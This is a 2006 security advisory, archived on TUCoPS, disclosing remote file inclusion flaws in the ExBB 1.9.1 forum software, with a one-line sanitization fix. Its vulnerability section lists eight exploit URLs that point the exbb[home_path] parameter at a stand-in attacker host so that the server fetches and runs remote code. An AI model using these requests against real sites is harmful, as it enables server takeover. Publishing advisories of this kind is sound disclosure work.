TUCoPS :: Web BBS :: etc :: b06-4513.htm

ExBB v1.9.1 (exbb) Multiple Remote File Inclusion
ExBB v1.9.1 (exbb) Multiple Remote File Inclusion
ExBB v1.9.1 (exbb) Multiple Remote File Inclusion



ECHO.OR.ID=0D
------------------------------------------------------------------------------=0D
[ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path]) Multiple Remote File Inclusion=0D
------------------------------------------------------------------------------=0D
=0D
Author		: Ahmad Maulana a.k.a Matdhule=0D
Date Found	: August, 30th 2006=0D
Location	: Indonesia, Jakarta=0D
web		: http://advisories.echo.or.id/adv/adv46-matdhule-2006.txt=0D 
Critical Lvl	: Highly critical=0D
Impact		: System access=0D
Where		: From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
ExBB 1.9.1=0D
=0D
Application	: ExBB=0D
version		: 1.9.1=0D
URL		: http://www.exbb.net=0D 
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~=0D
=0D
In folder birstday we found vulnerability script birst.php=0D
---------------------------birst.php---------------------------------------=0D
....=0D
http://target.com/[exbb_path]/modules/birstday/birst.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/birstday/select.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/birstday/profile_show.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/newusergreatings/pm_newreg.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/punish/p_error.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/punish/profile.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/threadstop/threadstop.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
http://target.com/[exbb_path]/modules/userstop/userstop.php?exbb[home_path]=http://attacker.com/inject.txt?=0D 
=0D
Solution:=0D
~~~~~~~=0D
- Sanitize variable $exbb['home_path'] on affected files.=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~=0D
~ solpot a.k.a chris, J4mbi  H4ck3r thx for the hacking lesson    :)   =0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama, BlueSpy, str0ke=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D 
~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net=0D 
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~=0D
 =0D
     matdhule[at]gmail[dot]com=0D
     =0D
-------------------------------- [ EOF ]----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH